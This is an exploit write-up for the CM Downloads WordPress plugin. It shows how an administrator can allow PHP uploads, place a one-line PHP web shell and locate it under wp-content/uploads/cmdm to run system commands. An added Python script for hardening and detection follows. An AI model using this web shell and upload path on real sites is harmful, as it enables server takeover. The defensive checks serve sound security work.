## https://sploitus.com/exploit?id=WPEX-ID:D18E695B-4D6E-4FF6-A060-312594A0D2BD
##########################
Activate PHP extension:
##########################

- Log in and go to "CM Downloads" > "Settings" > "General".

- Now you can simply add the php extension to the "Allowed file extensions:" field, because the plugin does not reject the php extension.

##################################
Upload our malicious PHP file:
##################################

- Go to "CM Downloads" > "Add New".

- Upload our malicious file:

	For example: malicious_php.php
	<?=`$_GET[cmd]`?>

##########################
Find the right path:
##########################

There are two ways to find the path, because the upload code renames the file like this:

   $name = time() . '_' . sanitize_file_name($_download_file['name']);

But we don't need to write a script; the path can be recovered more easily:

- Go to "CM Downloads" > "CM Downloads".
- Click on "Edit" next to the name we gave to our Download; this redirects us to the edit page.
- Note the id in the URL, for example: http://target/cmdownload/edit/id/7/ => here the id is 7
- We can find the name of our malicious file below the "Browse" button : 1660921772_malicious_php.php
- So now we can execute system commands; the file is served from:

 => target/wp-content/uploads/cmdm/id/filename

 https://target/wp-content/uploads/cmdm/7/1660921772_malicious_php.php?cmd=command
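Two defender-side checks that follow from the steps above, written in Python as an added example (this is not code from the write-up or from the CM Downloads plugin). The first validates an "Allowed file extensions" setting and an uploaded filename so that server-executable types cannot get through, including double extensions such as name.php.jpg; the second sweeps a list of upload paths for files under wp-content/uploads/cmdm/<id>/ that match the time()_name pattern and carry an executable extension, which is what an incident responder would look for after the fact. The setting format, the list of executable extensions beyond php, and the sample paths are assumptions and constructed input.

```python
"""Hardening and detection checks for the CM Downloads upload path.

Added example, not part of the original write-up or of the plugin. The
'Allowed file extensions' setting format, the extensions beyond 'php' and
the sample paths are assumptions/constructed input.
"""
from __future__ import annotations

import re
from pathlib import PurePosixPath

# Extensions a typical PHP web server will execute server-side. The write-up
# only mentions "php"; the other entries are assumptions based on common
# Apache/nginx handler configurations.
SERVER_EXECUTABLE_EXTENSIONS = frozenset({
    "php", "php3", "php4", "php5", "php7", "php8", "phtml", "phar", "phps", "pht",
})

# Layout from the write-up: wp-content/uploads/cmdm/<download id>/<time()>_<sanitized name>
CMDM_UPLOAD_RE = re.compile(
    r"^wp-content/uploads/cmdm/(?P<id>\d+)/(?P<ts>\d+)_(?P<name>[^/]+)$"
)


def normalize_extensions(setting: str) -> set[str]:
    """Parse an allow-list setting (assumed comma/space separated, optional
    leading dots) into a lowercase set of extensions."""
    parts = re.split(r"[,\s]+", setting.strip())
    return {p.lstrip(".").lower() for p in parts if p.strip(".")}


def forbidden_allowlist_entries(setting: str) -> set[str]:
    """Entries in the setting that a hardened plugin should refuse to save.
    The write-up shows that 'php' is currently accepted here."""
    return normalize_extensions(setting) & SERVER_EXECUTABLE_EXTENSIONS


def executable_suffixes(filename: str) -> list[str]:
    """All suffix components of a filename (lowercased, no dots) that are
    server-executable; checks every component so shell.php.txt is caught."""
    suffixes = [s.lstrip(".").lower() for s in PurePosixPath(filename).suffixes]
    return [s for s in suffixes if s in SERVER_EXECUTABLE_EXTENSIONS]


def upload_name_is_acceptable(filename: str, allowed: set[str]) -> bool:
    """Hardened replacement for an extension-only check: the allow-list itself
    must be clean, the file needs an extension, no component may be executable,
    and the final extension must be on the allow-list."""
    if allowed & SERVER_EXECUTABLE_EXTENSIONS:
        return False
    suffixes = [s.lstrip(".").lower() for s in PurePosixPath(filename).suffixes]
    if not suffixes or executable_suffixes(filename):
        return False
    return suffixes[-1] in allowed


def find_suspicious_uploads(paths: list[str]) -> list[tuple[int, int, str]]:
    """Scan upload paths (e.g. from `find wp-content/uploads/cmdm -type f`) and
    return (download id, upload timestamp, sanitized name) for every file that
    matches the cmdm naming scheme and has an executable suffix component."""
    hits: list[tuple[int, int, str]] = []
    for path in paths:
        match = CMDM_UPLOAD_RE.match(path.lstrip("/"))
        if match and executable_suffixes(match.group("name")):
            hits.append((int(match.group("id")), int(match.group("ts")), match.group("name")))
    return hits


# Constructed sample listing; the first entry mirrors the write-up's example path.
SAMPLE_PATHS = [
    "wp-content/uploads/cmdm/7/1660921772_malicious_php.php",
    "wp-content/uploads/cmdm/3/1660900000_quarterly-report.pdf",
    "wp-content/uploads/cmdm/9/1660921800_avatar.php.jpg",
    "wp-content/uploads/2022/08/banner.png",
]


if __name__ == "__main__":
    print("bad allow-list entries:", forbidden_allowlist_entries("pdf, zip, php"))
    for download_id, ts, name in find_suspicious_uploads(SAMPLE_PATHS):
        print(f"suspicious upload: download id={download_id} uploaded at={ts} name={name}")
```

Running the sweep over a real listing (for example the output of `find wp-content/uploads/cmdm -type f`) gives the download id and the upload timestamp for each hit, which ties the file back to the "CM Downloads" entry and to the time window to look at in the web server and WordPress activity logs.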